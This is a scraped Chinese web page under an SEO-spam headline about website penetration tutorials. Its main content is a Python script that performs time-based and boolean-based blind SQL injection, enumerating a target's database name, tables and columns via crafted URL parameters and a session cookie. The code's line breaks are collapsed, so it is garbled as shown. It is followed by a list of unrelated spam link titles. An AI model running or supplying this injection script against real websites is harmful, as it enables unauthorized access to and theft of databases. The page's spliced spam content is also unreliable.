当前位置: 首页 > news >正文

网站渗透入侵全部教程厦门网站做的比较好

news 2025/9/17 23:16:28
网站渗透入侵全部教程,厦门网站做的比较好,建设网站的申请,工程造价信息网官网查询python 实现盲注 该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名…

python 实现盲注

该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用.

import requests, time# 时间型盲注
def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名长度 1~19start = time.time()header = {"Cookie": cookie}url = f"{base_url} and if(length(database())={length}, sleep(3.5), 1)"_ = requests.get(url=url, headers=header)end = time.time()resptime = end-startif int(resptime) >= 3:print('数据库长度为:', length)breakelse:print(url)# 布尔型盲注爆列名
def bool_blind(base_url, cookie):chars = "abcdefghijklmnopqrstuvwxyz0123456789_,"session = requests.session()base_url = base_urlheader = {"Cookie": cookie}# 先定义猜对的时候的长度resp = session.get(url=base_url + " and 1=1", headers=header)base_len = len(resp.text)# 先获取数据库长度for db_len in range(1, 20):url = f"{base_url} and length(database())={db_len}"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:breakprint(f"数据库长度:{db_len}")# 根据数据库长度猜名称db_name = ''for i in range(1, db_len+1):for c in chars:url = f"{base_url} and substr(database(), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:db_name += cbreakprint(f"数据库名:{db_name}")# 根据数据库名称猜表名table_name = ''for i in range(1, 40):for c in chars:sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:table_name += cbreakprint(f"数据库中的表名:{table_name}")# 猜所有表的列名table_list = table_name.strip().split(',')for table in table_list:column_name = ''for i in range(100):for c in chars:sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='{table}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:column_name += cbreakprint(f"表{table}的列名:{column_name}")if __name__ == '__main__':url = "http://192.168.112.200/security/read.php?id=1"cookie = "PHPSESSID=b4d659be5e17d948fd8e18078003d3f6"time_blind(base_url=url, cookie=cookie)# bool_blind(base_url=url, cookie=cookie)
http://www.yayakq.cn/news/240227/

相关文章:

  • 正能量网站ip网站编辑
  • 设计图片网站网站备案复查
  • 网站开发选定制还是模板网站建设超速云免费
  • 泉州做网站开发公司网站建设该如何学
  • 打开网站无反应怎么做衡水seo优化
  • 广东网站建设公司哪家便宜顺通建设集团有限公司 网站
  • 给企业做网站推广好么做公众号需要网站
  • 一级做爰网站WordPress中英文旅游模板
  • 白沟17网站一起做网店注册投资管理公司需要什么条件
  • 网站建设开发能力很强的企业即墨做砍价小程序最好的网站
  • 东莞做阀门的网站用vue做多页面网站
  • 北京网站建设工作智慧团建手机版
  • 济南市住建局官方网站无锡网站制作服务
  • 网站建设一般怎么付款医疗类网站备案
  • 深圳网站制作公司资讯自动的网站设计制作
  • 安徽禹尧工程建设有限公司网站wordpress装百度联盟广告
  • 质量基础设施一站式服务工作站网站公网安备链接怎么做
  • 南京品牌网站开发模板建站语言
  • 苏州网站开发公司兴田德润怎么联系重庆网络营销与网络广告
  • 自己制作网站的方法是wordpress 手风琴
  • 常见的三种网站类型如何把音乐导入wordpress
  • 深圳市网站建设做网站海淀区
  • 谷歌网站收录入口seo关键词排名优化官网
  • 唐山模板建站系统成都网站优化公司哪家好
  • 网页设计企业网站设计的功能学做网站设计需要多少钱
  • 三亚旅游网站建设哪家公司可以做网站
  • 十大网站建设服务商wordpress 段落显示
  • 学做电商网站河南渠道网
  • 国外做设计的网站有哪些专业微信网站建设
  • 网站建站华为云建设网站东莞公司